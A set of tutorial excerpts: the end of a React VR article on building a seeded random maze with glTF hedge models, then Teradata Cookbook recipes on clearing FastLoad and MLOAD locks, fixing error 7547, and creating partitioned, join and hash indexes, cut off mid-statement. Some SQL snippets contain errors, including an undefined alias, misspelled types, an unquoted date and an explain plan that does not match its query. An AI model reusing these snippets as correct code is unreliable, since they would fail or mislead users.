little different. With Node.js, we use package.json to indicate what packages we need. 
To bring those packages into our code, we will use the following syntax in your .js files: var MersenneTwister = require('mersenne-twister'); Then, instead of using Math.random(), we will create a new random number generator and pass a seed, as follows: var rng = new MersenneTwister(this.props.Seed); From this point on, you just call rng.random() instead of Math.random(). We can just use npm install <package> and the require statement for properly formatted packages. Much of this can be done for you by executing the npm command: npm install mersenne-twister --save Remember, the --save command to update our manifest in the project. While we are at it, we can install another package we'll need later: npm install react-vr-gaze-button --save Now that we have a good random number generator, let's use it to complicate our world. The Maze render() How do we build a Maze? I wanted to develop some code that dynamically generates the Maze; anyone could model it in a package, but a VR world should be living. Having code that can dynamically build Maze in any size (to a point) will allow a repeat playing of your world. There are a number of JavaScript packages out there for printing mazes. I took one that seemed to be everywhere, in the public domain, on GitHub and modified it for HTML. This app consists of two parts: Maze.html and makeMaze.JS. Neither is React, but it is JavaScript. It works fairly well, although the numbers don't really represent exactly how wide it is. First, I made sure that only one x was displaying, both vertically and horizontally. This will not print well (lines are usually taller than wide), but we are building a virtually real Maze, not a paper Maze. The Maze that we generate with the files at Maze.html (localhost:8081/vr/maze.html) and the JavaScript file—makeMaze.js—will now look like this: x1xxxxxxx x x x xxx x x x x x x x x xxxxx x x x x x x x x x x x x 2 xxxxxxxxx It is a little hard to read, but you can count the squares vs. xs. Don't worry, it's going to look a lot fancier. Now that we have the HTML version of a Maze working, we'll start building the hedges. This is a slightly larger piece of code than I expected, so I broke it into pieces and loaded the Maze object onto GitHub rather than pasting the entire code here, as it's long. You can find a link for the source at: http://bit.ly/VR_Chap11 Adding the floors and type checking One of the things that look odd with a 360 Pano background, as we've talked about before, is that you can seem to "float" against the ground. One fix, other than fixing the original image, is to simply add a floor. This is what we did with the Space Gallery, and it looks pretty good as we were assuming we were floating in space anyway. For this version, let's import a ground square. We could use a large square that would encompass the entire Maze; we'd then have to resize it if the size of the Maze changes. I decided to use a smaller cube and alter it so that it's "underneath" every cell of the Maze. This would allow us some leeway in the future to rotate the squares for worn paths, water traps, or whatever. To make the floor, we will use a simple cube object that I altered slightly and is UV mapped. I used Blender for this. We also import a Hedge model, and a Gem, which will represent where we can teleport to. 
Inside 'Maze.js' we added the following code: import Hedge from './Hedge.js'; import Floor from './Hedge.js'; import Gem from './Gem.js'; Then, inside the Maze.js we could instantiate our floor with the code: <Floor X={-2} Y={-4}/> Notice that we don't use 'vr/components/Hedge.js' when we do the import; we're inside Maze.js. However, in index.vr.js to include the Maze, we do need: import Maze from './vr/components/Maze.js'; It's slightly more complicated though. In our code, the Maze builds the data structures when props have changed; when moving, if the maze needs rendering again, it simply loops through the data structure and builds a collection (mazeHedges) with all of the floors, teleport targets, and hedges in it. Given this, to create the floors, the line in Maze.js is actually: mazeHedges.push(<Floor {...cellLoc} />); Here is where I ran into two big problems, and I'll show you what happened so that you can avoid these issues. Initially, I was bashing my head against the wall trying to figure out why my floors looked like hedges. This one is pretty easy—we imported Floor from the Hedge.js file. The floors will look like hedges (did you notice this in my preceding code? If so, I did this on purpose as a learning experience. Honest). This is an easy fix. Make sure that you code import Floor from './floor.js'; note that Floor not type-checked. (It is, after all, JavaScript.) I thought this was odd, as the hedge.js file exports a Hedge object, not a Floor object, but be aware you can rename the objects as you import them. The second problem I had was more of a simple goof that is easy to occur if you aren't really thinking in React. You may run into this. JavaScript is a lovely language, but sometimes I miss a strongly typed language. Here is what I did: <Maze SizeX='4' SizeZ='4' CellSpacing='2.1' Seed='7' /> Inside the maze.js file, I had code like this: for (var j = 0; j < this.props.SizeX + 2; j++) { After some debugging, I found out that the value of j was going from 0 to 42. Why did it get 42 instead of 6? The reason was simple. We need to fully understand JavaScript to program complex apps. The mistake was in initializing SizeX to be '4' ; this makes it a string variable. When calculating j from 0 (an integer), React/JavaScript takes 2, adds it to a string of '4', and gets the 42 string, then converts it to an integer and assigns this to j. When this is done, very weird things happened. When we were building the Space Gallery, we could easily use the '5.1' values for the input to the box: <Pedestal MyX='0.0' MyZ='-5.1'/> Then, later use the transform statement below inside the class: transform: [ { translate: [ this.props.MyX, -1.7, this.props.MyZ] } ] React/JavaScript will put the string values into This.Props.MyX, then realize it needs an integer, and then quietly do the conversion. However, when you get more complicated objects, such as our Maze generation, you won't get away with this. Remember that your code isn't "really" JavaScript. It's processed. At the heart, this processing is fairly simple, but the implications can be a killer. Pay attention to what you code. With a loosely typed language such as JavaScript, with React on top, any mistakes you make will be quietly converted to something you didn't intend. You are the programmer. Program correctly. So, back to the Maze. The Hedge and Floor are straightforward copies of the initial Gem code. 
Let's take a look at our starting Gem, although note it gets a lot more complicated later (and in your source files): import React, { Component } from 'react'; import { asset, Box, Model, Text, View } from 'react-vr'; export default class Gem extends Component { constructor() { super(); this.state = { Height: -3 }; } render() { return ( <Model source={{ gltf2: asset('TeleportGem.gltf'), }} style={{ transform: [{ translate: [this.props.X, this.state.Height, this.props.Z] }] }} /> ); } } The Hedge and Floor are essentially the same thing. (We could have made a prop be the file loaded, but we want a different behavior for the Gem, so we will edit this file extensively.) To run this sample, first, we should have created a directory as you have before, called WalkInAMaze. Once you do this, download the files from the Git source for this part of the article (http://bit.ly/VR_Chap11). Once you've created the app, copied the files, and fired it up, (go to the WalkInAMaze directory and type npm start), and you should see something like this once you look around - except, there is a bug. This is what the maze should look like (if you use the file  'MazeHedges2DoubleSided.gltf' in Hedge.js, in the <Model> statement):> Now, how did we get those neat-looking hedges in the game? (OK, they are pretty low poly, but it is still pushing it.) One of the nice things about the pace of improvement on web standards is their new features. Instead of just .obj file format, React VR now has the capability to load glTF files. Using the glTF file format for models glTF files are a new file format that works pretty naturally with WebGL. There are exporters for many different CAD packages. The reason I like glTF files is that getting a proper export is fairly straightforward. Lightwave OBJ files are an industry standard, but in the case of React, not all of the options are imported. One major one is transparency. The OBJ file format allows that, but at of the time of writing this book, it wasn't an option. Many other graphics shaders that modern hardware can handle can't be described with the OBJ file format. This is why glTF files are the next best alternative for WebVR. It is a modern and evolving format, and work is being done to enhance the capabilities and make a fairly good match between what WebGL can display and what glTF can export. This is however on interacting with the world, so I'll give a brief mention on how to export glTF files and provide the objects, especially the Hedge, as glTF models. The nice thing with glTF from the modeling side is that if you use their material specifications, for example, for Blender, then you don't have to worry that the export won't be quite right. Today's physically Based Rendering (PBR) tends to use the metallic/roughness model, and these import better than trying to figure out how to convert PBR materials into the OBJ file's specular lighting model. Here is the metallic-looking Gem that I'm using as the gaze point: Using the glTF Metallic Roughness model, we can assign the texture maps that programs, such as Substance Designer, calculate and import easily. The resulting figures look metallic where they are supposed to be metallic and dull where the paint still holds on. I didn't use Ambient Occlusion here, as this is a very convex model; something with more surface depressions would look fantastic with Ambient Occlusion. It would also look great with architectural models, for example, furniture. 
To convert your models, there is user documentation at http://bit.ly/glTFExporting. You will need to download and install the Blender glTF exporter. Or, you can just download the files I have already converted. If you do the export, in brief, you do the following steps: Download the files from http://bit.ly/gLTFFiles. You will need the gltf2_Principled.blend file, assuming that you are on a newer version of Blender. In Blender, open your file, then link to the new materials. Go to File->Link, then choose the gltf2_Principled.blend file. Once you do that, drill into "NodeTree" and choose either glTF Metallic Roughness (for metal), or glTF specular glossiness for other materials. Choose the object you are going to export; make sure that you choose the Cycles renderer. Open the Node Editor in a window. Scroll down to the bottom of the Node Editor window, and make sure that the box Use Nodes is checked. Add the node via the nodal menu, Add->Group->glTF Specular Glossiness or Metallic Roughness. Once the node is added, go to Add->Texture->Image texture. Add as many image textures as you have image maps, then wire them up. You should end up with something similar to this diagram. To export the models, I recommend that you disable camera export and combine the buffers unless you think you will be exporting several models that share geometry or materials. The Export options I used are as follows: Now, to include the exported glTF object, use the <Model> component as you would with an OBJ file, except you have no MTL file. The materials are all described inside the .glTF file. To include the exported glTF object, you just put the filename as a gltf2 prop in the <Model: <Model source={{ gltf2: asset('TeleportGem2.gltf'),}} ... To find out more about these options and processes, you can go to the glTF export web site. This site also includes tutorials on major CAD packages and the all-important glTF shaders (for example, the Blender model I showed earlier). I have loaded several .OBJ files and .glTF files so you can experiment with different combinations of low poly and transparency. When glTF support was added in React VR version 2.0.0, I was very excited as transparency maps are very important for a lot of VR models, especially vegetation; just like our hedges. However, it turns out there is a bug in WebGL or three.js that does not render the transparency properly. As a result, I have gone with a low polygon version in the files on the GitHub site; the pictures, above, were with the file MazeHedges2DoubleSided.gltf in the Hedges.js file (in vr/components). If you get 404 errors, check the paths in the glTF file. It depends on which exporter you use—if you are working with Blender, the gltf2 exporter from the Khronos group calculates the path correctly, but the one from Kupoman has options, and you could export the wrong paths. We discussed important mechanics of props, state, and events. We also discussed how to create a maze using pseudo-random number generators to make sure that our props and state didn't change chaotically. To know more about how to create, move around in, and make worlds react to us in a Virtual Reality world, including basic teleport mechanics, do check out this book Getting Started with React VR.  Read More: Google Daydream powered Lenovo Mirage solo hits the market Google open sources Seurat to bring high precision graphics to Mobile VR Oculus Go, the first stand alone VR headset arrives!
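As a recap of the pseudo-random idea this article started with, here is a stripped-down sketch of how a seeded generator keeps a maze layout stable across renders. The prop names (SizeX, SizeZ, CellSpacing, Seed) follow the excerpt, but the cell layout logic is deliberately simplified, and the X/Z props on Floor and Hedge are assumptions; this is not the book's actual Maze.js implementation:

import React, { Component } from 'react';
import { View } from 'react-vr';
import Hedge from './Hedge.js';
import Floor from './Floor.js';
var MersenneTwister = require('mersenne-twister');

export default class SimpleMaze extends Component {
  render() {
    // Convert props explicitly: SizeX='4' arrives as a string, and string
    // arithmetic is exactly the bug described above.
    const sizeX = parseInt(this.props.SizeX, 10);
    const sizeZ = parseInt(this.props.SizeZ, 10);
    const spacing = parseFloat(this.props.CellSpacing);

    // Same Seed -> same sequence from rng.random() -> same maze on every render.
    const rng = new MersenneTwister(parseInt(this.props.Seed, 10));

    const cells = [];
    for (let x = 0; x < sizeX; x++) {
      for (let z = 0; z < sizeZ; z++) {
        const loc = { X: x * spacing, Z: -z * spacing };
        cells.push(<Floor key={'f' + x + '_' + z} {...loc} />);
        // Roughly one cell in three gets a hedge; deterministic for a given seed.
        if (rng.random() < 0.33) {
          cells.push(<Hedge key={'h' + x + '_' + z} {...loc} />);
        }
      }
    }
    return <View>{cells}</View>;
  }
}

A maze that is actually solvable needs a proper generation algorithm (the book ports an existing maze generator for this); the sketch above only shows the seeding pattern that makes the layout repeatable.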

How to prevent errors while using utilities for loading data in Teradata

Pravin Dhandre
11 Jun 2018
9 min read
In today’s tutorial we will assist you to overcome the errors that arise while loading, deleting or updating large volumes of data using Teradata Utilities. [box type="note" align="" class="" width=""]This article is an excerpt from Teradata Cookbook co-authored by Abhinav Khandelwal and Rajsekhar Bhamidipati. This book provides recipes to simplify the daily tasks performed by database administrators (DBA) along with providing efficient data warehousing solutions in Teradata database system.[/box] Resolving FastLoad error 2652 When data is being loaded via FastLoad, a table lock is placed on the target table. This means that the table is unavailable for any other operation. A lock on a table is only released when FastLoad encounters the END LOADING command, which terminates phase 2, the so-called application phase. FastLoad may get terminated in phase 1 due to any of the following reasons: Load script results in failure (error code 8 or 12) Load script is aborted by admin or some other session FastLoad fails due to bad record or file Forgetting to add end loading statement in script If so, it keeps a lock on the table, which needs to be released manually. In this recipe, we will see the steps to release FastLoad locks. Getting ready Identify the table on which FastLoad is been ended prematurely and tables are in locked state. You need to have valid credentials for the Teradata Database. Execute the dummy FastLoad script from the same user or the user which has write access to the lock table. A user requires the following privileges/rights in order to execute the FastLoad: SELECT and INSERT (CREATE and DROP or DELETE) access to the target or loading table CREATE and DROP TABLE on error tables SELECT, INSERT, UPDATE, and DELETE are required privileges for the user PUBLIC on the restart log table (SYSADMIN.FASTLOG). There will be a row in the FASTLOG table for each FastLoad job that has not completed in the system. How to do it... Open a notepad and create the following script: .LOGON 127.0.0.1/dbc, dbc; /* Vaild system name and credentials to your system */ .DATABASE Database_Name; /* database under which locked table is */ erorfiles errortable_name, uv_tablename /* same error table name as in script */ begin loading locked_table; /* table which is getting 2652 error */ .END LOADING; /* to end pahse 2 and release the lock */ .LOGOFF; Save it as dummy_fl.txt. Open the windows Command Prompt and execute this using the FastLoad command, as shown in the following screenshot: This dummy script with no insert statement should release the lock on the target Table. Execute Select on the locked table to see if the lock is released on the table. How it works... As FastLoad is designed to work only on empty tables, it becomes necessary that the loading of the table finishes in one go. If the load script is errored out prematurely in phase 2, without encountering the END loading command, it leaves a lock on loading the table. Fastload locks can't be released via the HUT utility, as there are no technical lock on the table. To execute FastLoad, the following are some requirements: Log table: FastLoad puts its progress information in the fastlog table. EMPTY TABLE: FastLoad needs the table to be empty before inserting rows into that table. TWO ERROR TABLES: FastLoad requires two error tables to be created; you just need to name them, and no ddl is required. 
The first error table records any translation or constraint violation error, whereas the second error table captures errors related to the duplication of values for Unique Primary Indexes (UPI). After the completion of FastLoad, you can analyze these error tables as to why the records got rejected. There's more... If this does not fix the issue, you need to drop the target table and error tables associated with it. Before proceeding with dropping tables, check with the administrator to abort any FastLoad sessions associated with this table. Resolving MLOAD error 2571 MLOAD works in five phases, unlike FastLoad, which only works in two phases. MLOAD can fail in either phase three or four. Figure shows 5 stages of MLOAD. Preliminary: Basic setup. Syntax checking, establishing session with the Teradata Database, creation of error tables (two error tables per target table), and the creation of work tables and log tables are done in this phase. DML Transaction phase: Request is parse through PE and a step plan is generated. Steps and DML are then sent to AMP and stored in appropriate work tables for each target table. Input data sent will be stored in these work tables, which will be applied to the target table later on. Acquisition phase: Unsorted data is sent to AMP in blocks of 64K. Rows are hashed by PI and sent to appropriate AMPs. Utility places locks on target tables in preparation for the application phase to apply rows in target tables. Application phase: Changes are applied to target tables and NUSI subtables. Lock on table is held in this phase. Cleanup phase: If the error code of all the steps is 0, MLOAD successfully completes and releases all the locks on the specified table. This being the case, all empty error tables, worktables, and the log table are dropped. Getting ready Identify the table which is getting affected by error 2571. Make sure no host utility is running on this table and the load job is in a failed state for this table. How to do it... Check on viewpoint for any active utility job for this table. If you find any active job, let it complete. If there is a reason that you need to release the lock, first abort all the sessions of the host utility from viewpoint. Ask your administrator to do it. Execute the following command: RELEASE MLOAD <databasename.tablename>; > If you get a Not able to release MLOAD Lock error, execute the following Command: /* Release lock in application phase */ RELEASE MLOAD <databasename.tablename> in apply; Once the locks are released you need to drop all the associated error tables, the log table, and work tables with it. Re-execute MLOAD after correcting the error. How it works... The Mload utility places a lock in table headers to alert other utilities that a MultiLoad is in session for this table. They include: Acquisition lock: DML allows all DDL allows DROP only Application lock: DML allows SELECT with ACCESS only DDL allows DROP only There's more... If the release lock statement still gives an error and does not release the lock on the table, you need to use SELECT with the ACCESS lock to copy the content of the locked table to a new one and drop the locked tables. If you start receiving the error 7446 Mload table %ID cannot be released because NUSI exists, you need to drop all the NUSI on the table and use ALTER Table to nonfallback to accomplish the task. Resolving failure 7547 This error is associated with the UPDATE statement, which could be SQL based or could be in MLOAD. 
Various times, while updating the set of rows in a table, the update fails on Failure 7547 Target row updated by multiple source rows. This error will happen when you update the target with multiple rows from the source. This means there are duplicated values present in the source tables. Getting ready Let's create sample volatile tables and insert values into them. After that, we will execute the UPDATE command, which will fail to result in 7547: Create a TARGET TABLE with the following DDL and insert values into it: ** TARGET TABLE** create volatile table accounts ( CUST_ID, CUST_NAME, Sal )with data primary index(cust_id) insert values (1,'will',2000); insert values (2,'bekky',2800); insert values (3,'himesh',4000); Create a SOURCE TABLE with the following DDL and insert values into it: ** SOURCE TABLE** create volatile table Hr_payhike ( CUST_ID, CUST_NAME, Sal_hike ) with data primary index(cust_id) insert values (1,'will',2030); insert values (1,'bekky',3800); insert values (3,'himesh',7000); Execute the MLOAD script. Following the snippet from the MLOAD script, only update part (which will fail): /* Snippet from MLOAD update */ UPDATE ACC FROM ACCOUNTS ACC , Hr_payhike SUPD SET Sal= TUPD.Sal_hike WHERE Acc.CUST_ID = SUPD.CUST_ID; Failure: Target row updated by multiple source rows How to do it... Check for duplicate values in the source table using the following: /*Check for duplicate values in source table*/ SELECT cust_id,count(*) from Hr_payhike group by 1 order by 2 desc The output will be generated with CUST_ID =1 and has two values which are causing errors. The reason for this is that while updating the TARGET table, the optimizer won't be able to understand from which row it should update the TARGET row. Who's salary will be updated Will or Bekky? To resolve the error, execute the following update query: /* Update part of MLOAD */ UPDATE ACC FROM ACCOUNTS ACC , ( SELECT CUST_ID, CUST_NAME, SAL_HIKE FROM Hr_payhike QUALIFY ROW_NUMBER() OVER (PARTITION BY CUST_ID ORDER BY CUST_NAME,SAL_HIKE DESC)=1) SUPD SET Sal= SUPD.Sal_hike WHERE Acc.CUST_ID = SUPD.CUST_ID; Now, the update will run without error. How it works... Failure will happen when you update the target with multiple rows from the source. If you defined a primary index column for your target, and if those columns are in an update query condition, this error will occur. To further resolve this, you can delete the duplicate from the source table itself and execute the original update without any modification. But if the source data can't be changed, then you need to change the update statement. To summarize, we have successfully learned how to overcome or prevent errors while using utilities for loading data into database. You could also check out the Teradata Cookbook  for more than 100 recipes on enterprise data warehousing solutions. 2018 is the year of graph databases. Here’s why. 6 reasons to choose MySQL 8 for designing database solutions Amazon Neptune, AWS’ cloud graph database, is now generally available
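If you prefer the other fix mentioned in the recipe, removing the duplicates from the source before running the original UPDATE, a minimal sketch is shown below. The deduplicated table name and the rule of keeping the row with the highest SAL_HIKE per CUST_ID are assumptions for illustration; adjust the ORDER BY to whichever business rule decides which duplicate should win:

/* Build a deduplicated copy of the source, one row per CUST_ID */
CREATE VOLATILE TABLE Hr_payhike_dedup AS
(
  SELECT CUST_ID, CUST_NAME, SAL_HIKE
  FROM Hr_payhike
  QUALIFY ROW_NUMBER() OVER (PARTITION BY CUST_ID ORDER BY SAL_HIKE DESC) = 1
) WITH DATA
PRIMARY INDEX (CUST_ID)
ON COMMIT PRESERVE ROWS;

/* The unmodified update now finds exactly one source row per target row */
UPDATE ACC
FROM ACCOUNTS ACC, Hr_payhike_dedup SUPD
SET Sal = SUPD.SAL_HIKE
WHERE ACC.CUST_ID = SUPD.CUST_ID;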

3 ways to use Indexes in Teradata to improve database performance

Pravin Dhandre
11 Jun 2018
15 min read
In this tutorial, we will create solutions to design indexes to help us improve query performance of Teradata database management system. [box type="note" align="" class="" width=""]This article is an excerpt from a book co-authored by Abhinav Khandelwal and Rajsekhar Bhamidipati titled Teradata Cookbook. This book will teach you to tackle problems related to efficient querying, stored procedure searching, and navigation techniques in a Teradata database.[/box] Creating a partitioned primary index to improve performance A PPI (partitioned primary index) is a type of index that enables users to set up databases that provide performance benefits from a data locality, while retaining the benefits of scalability inherent in the hash architecture of the Teradata database. This is achieved by hashing rows to different virtual AMPs, as is done with a normal PI, but also by creating local partitions within each virtual AMP. We will see how PPIs will improve the performance of a query. Getting ready You need to connect to the Teradata database. Let's create a table and insert data into it using the following DDL. This will be a non-partitioned table, as follows: /*NON PPI TABLE DDL*/ CREATE volatile TABLE EMP_SAL_NONPPI ( id INT, Sal INT, dob DATE, o_total INT ) primary index( id)   on commit preserve rows; INSERT into EMP_SAL_NONPPI VALUES (1001,2500,'2017-09-01',890); INSERT into EMP_SAL_NONPPI VALUES (1002,5500,'2017-09-10',890); INSERT into EMP_SAL_NONPPI VALUES (1003,500,'2017-09-02',890); INSERT into EMP_SAL_NONPPI VALUES (1004,54500,'2017-09-05',890); INSERT into EMP_SAL_NONPPI VALUES (1005,900,'2017-09-23',890); INSERT into EMP_SAL_NONPPI VALUES (1006,8900,'2017-08-03',890); INSERT into EMP_SAL_NONPPI VALUES (1007,8200,'2017-08-21',890); INSERT into EMP_SAL_NONPPI VALUES (1008,6200,'2017-08-06',890); INSERT into EMP_SAL_NONPPI VALUES (1009,2300,'2017-08-12',890); INSERT into EMP_SAL_NONPPI VALUES (1010,9200,'2017-08-15',890); Let's check the explain plan of the following query; we are selecting data based on the DOB column using the following code: /*Select on NONPPI table*/ SELECT * from EMP_SAL_NONPPI where dob <= 2017-08-01 Following is the snippet from SQLA showing explain plan of the query: As seen in the following explain plan, an all-rows scan can be costly in terms of CPU and I/O if the table has millions of rows: Explain SELECT * from EMP_SAL_NONPPI where dob <= 2017-08-01; /*EXPLAIN PLAN of SELECT*/ 1) First, we do an all-AMPs RETRIEVE step from DBC.EMP_SAL_NONPPI by way of an all-rows scan with a condition of ("DBC.EMP_SAL_NONPPI.dob <= DATE '1900-12-31'") into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with no confidence to be 4 rows (148 bytes). The estimated time for this step is 0.04 seconds. 2) Finally, we send out an END TRANSACTION step to all AMPs involved in processing the request. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. Let's see how we can enable partition retrieval in the same query. How to do it... Connect to the Teradata database using SQLA or Studio. Create the following table with the data. 
We will define a PPI on the column DOB: /*Partition table*/ CREATE volatile TABLE EMP_SAL_PPI ( id INT, Sal int, dob date, o_total int ) primary index( id) PARTITION BY RANGE_N (dob BETWEEN DATE '2017-01-01' AND DATE '2017-12-01' EACH INTERVAL '1' DAY) on commit preserve rows; INSERT into EMP_SAL_PPI VALUES (1001,2500,'2017-09-01',890); INSERT into EMP_SAL_PPI VALUES (1002,5500,'2017-09-10',890); INSERT into EMP_SAL_PPI VALUES (1003,500,'2017-09-02',890); INSERT into EMP_SAL_PPI VALUES (1004,54500,'2017-09-05',890); INSERT into EMP_SAL_PPI VALUES (1005,900,'2017-09-23',890); INSERT into EMP_SAL_PPI VALUES (1006,8900,'2017-08-03',890); INSERT into EMP_SAL_PPI VALUES (1007,8200,'2017-08-21',890); INSERT into EMP_SAL_PPI VALUES (1008,6200,'2017-08-06',890); INSERT into EMP_SAL_PPI VALUES (1009,2300,'2017-08-12',890); INSERT into EMP_SAL_PPI VALUES (1010,9200,'2017-08-15',890); Let's execute the same query on a new partition table: /*SELECT on PPI table*/ sel * from EMP_SAL_PPI where dob <= 2017-08-01 Following snippet from SQLA shows query and explain plan of the query: The data is being accessed using only a single partition, as shown in the following block: /*EXPLAIN PLAN*/ 1) First, we do an all-AMPs RETRIEVE step from a single partition of SYSDBA.EMP_SAL_PPI with a condition of ("SYSDBA.EMP_SAL_PPI.dob = DATE '2017-08-01'") with a residual condition of ( "SYSDBA.EMP_SAL_PPI.dob = DATE '2017-08-01'") into Spool 1 (group_amps), which is built locally on the AMPs. The size of Spool 1 is estimated with no confidence to be 1 row (37 bytes). The estimated time for this step is 0.04 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.04 seconds. How it works... A partitioned PI helps in improving the performance of a query by avoiding a full table scan elimination. A PPI works the same as a primary index for data distribution, but creates partitions according to ranges or cases, as specified in the table. There are four types of PPI that can be created in a table: Case partitioning: /*CASE partition*/ CREATE TABLE SALES_CASEPPI ( ORDER_ID INTEGER, CUST_ID INTERGER, ORDER_DT DATE, ) PRIMARY INDEX(ORDER_ID) PARTITION BY CASE_N(ORDER_ID < 101, ORDER_ ID < 201, ORDER_ID < 501, NO CASE,UNKNOWN); Range-based partitioning: /*Range Partition table*/ CREATE volatile TABLE EMP_SAL_PPI ( id INT, Sal int, dob date, o_total int ) primary index( id) PARTITION BY RANGE_N (dob BETWEEN DATE '2017-01-01' AND DATE '2017-12-01' EACH INTERVAL '1' DAY) on commit preserve rows Multi-level partitioning: CREATE TABLE SALES_MLPPI_TABLE ( ORDER_ID INTEGER NOT NULL, CUST_ID INTERGER, ORDER_DT DATE, ) PRIMARY INDEX(ORDER_ID) PARTITION BY (RANGE_N(ORDER_DT BETWEEN DATE '2017-08-01' AND DATE '2017-12-31' EACH INTERVAL '1' DAY) CASE_N (ORDER_ID < 1001, ORDER_ID < 2001, ORDER_ID < 3001, NO CASE, UNKNOWN)); Character-based partitioning: /*CHAR Partition*/ CREATE TABLE SALES_CHAR_PPI ( ORDR_ID INTEGER, EMP_NAME VARCHAR (30) CHARACTER, PRIMARY INDEX (ORDR_ID) PARTITION BY CASE_N ( EMP_NAME LIKE 'A%', EMP_NAME LIKE 'B%', EMP_NAME LIKE 'C%', EMP_NAME LIKE 'D%', EMP_NAME LIKE 'E%', EMP_NAME LIKE 'F%', NO CASE, UNKNOWN); PPI not only helps in improving the performance of queries, but also helps in table maintenance. 
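Because each AMP now stores its rows in date-based partitions, ordinary SQL can show you how the demo data is spread out, which is also handy for the maintenance work mentioned above. A small sketch against the EMP_SAL_PPI table created in this recipe (the row counts will of course reflect whatever you inserted):

/* Sketch: inspect row distribution across partitions of EMP_SAL_PPI */
SELECT PARTITION AS partition_no,
       MIN(dob)  AS first_dob,
       MAX(dob)  AS last_dob,
       COUNT(*)  AS row_count
FROM EMP_SAL_PPI
GROUP BY 1
ORDER BY 1;

Each row of the result corresponds to one non-empty partition, so a quick glance tells you whether the partitioning expression is slicing the data the way you expected.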
But there are certain performance considerations that you might need to keep in mind when creating a PPI on a table, and they are: If partition column criteria is not present in the WHERE clause while selecting primary indexes, it can slow the query The partitioning of the column must be carefully chosen in order to gain maximum benefits Drop unneeded secondary indexes or value-ordered join indexes Creating a join index to improve performance A join index is a data structure that contains data from one or more tables, with or without aggregation: In this, we will see how join indexes help in improving the performance of queries. Getting ready You need to connect to the Teradata database using SQLA or Studio. Let's create a table and insert the following code into it: CREATE TABLE td_cookbook.EMP_SAL ( id INT, DEPT varchar(25), emp_Fname varchar(25), emp_Lname varchar(25), emp_Mname varchar(25), status INT )primary index(id); INSERT into td_cookbook.EMP_SAL VALUES (1,'HR','Anikta','lal','kumar',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Anik','kumar','kumar',2); INSERT into td_cookbook.EMP_SAL VALUES (3,'IT','Arjun','sharma','lal',1); INSERT into td_cookbook.EMP_SAL VALUES (4,'SALES','Billa','Suti','raj',2); INSERT into td_cookbook.EMP_SAL VALUES (4,'IT','Koyd','Loud','harlod',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Harlod','lal','kumar',1); Further, we will create a single table join index with a different primary index of the table. How to do it... The following are the steps to create a join index to improve performance: Connect to the Teradata database using SQLA or Studio. Check the explain plan for the following query: /*SELECT on base table*/ EXPLAIN SELECT id,dept,emp_Fname,emp_Lname,status from td_cookbook.EMP_SAL where id=4; 1) First, we do a single-AMP RETRIEVE step from td_cookbook.EMP_SAL by way of the primary index "td_cookbook.EMP_SAL.id = 4" with no residual conditions into Spool 1 (one-amp), which is built locally on that AMP. The size of Spool 1 is estimated with low confidence to be 2 rows (118 bytes). The estimated time for this step is 0.02 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. The total estimated time is 0.02 seconds. Query with a WHERE clause on id; then the system will query the EMP table using the primary index of the base table, which is id. Now, if a user wants to query a table on column emp_Fname, an all row scan will occur, which will degrade the performance of the query, as shown in the following screenshot: Now, we will create a JOIN INDEX using emp_Fname as the primary index: /*Join Index*/ CREATE JOIN INDEX td_cookbook.EMP_JI AS SELECT id,emp_Fname,emp_Lname,status,emp_Mname,dept FROM td_cookbook.EMP_SAL PRIMARY INDEX(emp_Fname); Let's collect statistics on the join index: /*Collect stats on JI*/ collect stats td_cookbook.EMP_JI column emp_Fname Now, we will check the explain plan query on the WHERE clause using the column emp_Fname: Explain sel id,dept,emp_Fname,emp_Lname,status from td_cookbook.EMP_SAL where emp_Fname='ankita'; 1) First, we do a single-AMP RETRIEVE step from td_cookbooK.EMP_JI by way of the primary index "td_cookbooK.EMP_JI.emp_Fname = 'ankita'" with no residual conditions into Spool 1 (one-amp), which is built locally on that AMP. The size of Spool 1 is estimated with low confidence to be 2 rows (118 bytes). The estimated time for this step is 0.02 seconds. -> The contents of Spool 1 are sent back to the user as the result of statement 1. 
The total estimated time is 0.02 seconds. In EXPLAIN, you can see that the optimizer is using the join index instead of the base table when the table queries are using the Emp_Fname column. How it works... Query performance improves any time a join index can be used instead of the base tables. A join index is most useful when its columns can satisfy, or cover, most or all of the requirements in a query. For example, the optimizer may consider using a covering index instead of performing a merge join. When we are able to cover all the queried columns that can be satisfied by a join index, then it is called a cover query. Covering indexes improve the speed of join queries. The extent of improvement can be dramatic, especially for queries involving complex, large-table, and multiple-table joins. The extent of such improvement depends on how often an index is appropriate to a query. There are a few more join indexes that can be used in Teradata: Aggregate-table join index: A type of join index which pre-joins and summarizes aggregated tables without requiring any physical summary tables. It refreshes automatically whenever the base table changes. Only COUNT and SUM are permitted, and DISTINCT is not permitted: /*AG JOIN INDEX*/ CREATE JOIN INDEX Agg_Join_Index AS SELECT Cust_ID, Order_ID, SUM(Sales_north) -- Aggregate column FROM sales_table GROUP BY 1,2 Primary Index(Cust_ID) Use FLOAT as a data type for COUNT and SUM to avoid overflow. Sparse join index: When a WHERE clause is applied in a JOIN INDEX, it is know as a sparse join index. By limiting the number of rows retrieved in a join, it reduces the size of the join index. It is also useful for UPDATE statements where the index is highly selective: /*SP JOIN INDEX*/ CREATE JOIN INDEX Sparse_Join_Index AS SELECT Cust_ID, Order_ID, SUM(Sales_north) -- Aggregate column FROM sales_table where Order_id = 1 -- WHERE CLAUSE GROUP BY 1,2 Primary Index(Cust_ID) Creating a hash index to improve performance Hash indexes are designed to improve query performance like join indexes, especially single table join indexes, and in addition, they enable you to avoid accessing the base table. The syntax for the hash index is as follows: /*Hash index syntax*/ CREATE HASH INDEX <hash-index-name> [, <fallback-option>] (<column-name-list1>) ON <base-table> [BY (<partition-column-name-list2>)] [ORDER BY <index-sort-spec>] ; Getting ready You need to connect to the Teradata database. Let's create a table and insert data into it using the following DDL: /*Create table with data*/ CREATE TABLE td_cookbook.EMP_SAL ( id INT, DEPT varchar(25), emp_Fname varchar(25), emp_Lname varchar(25), emp_Mname varchar(25), status INT )primary index(id); INSERT into td_cookbook.EMP_SAL VALUES (1,'HR','Anikta','lal','kumar',1); INSERT into td_cookbook.EMP_SAL VALUES (2,'HR','Anik','kumar','kumar',2); INSERT into td_cookbook.EMP_SAL VALUES 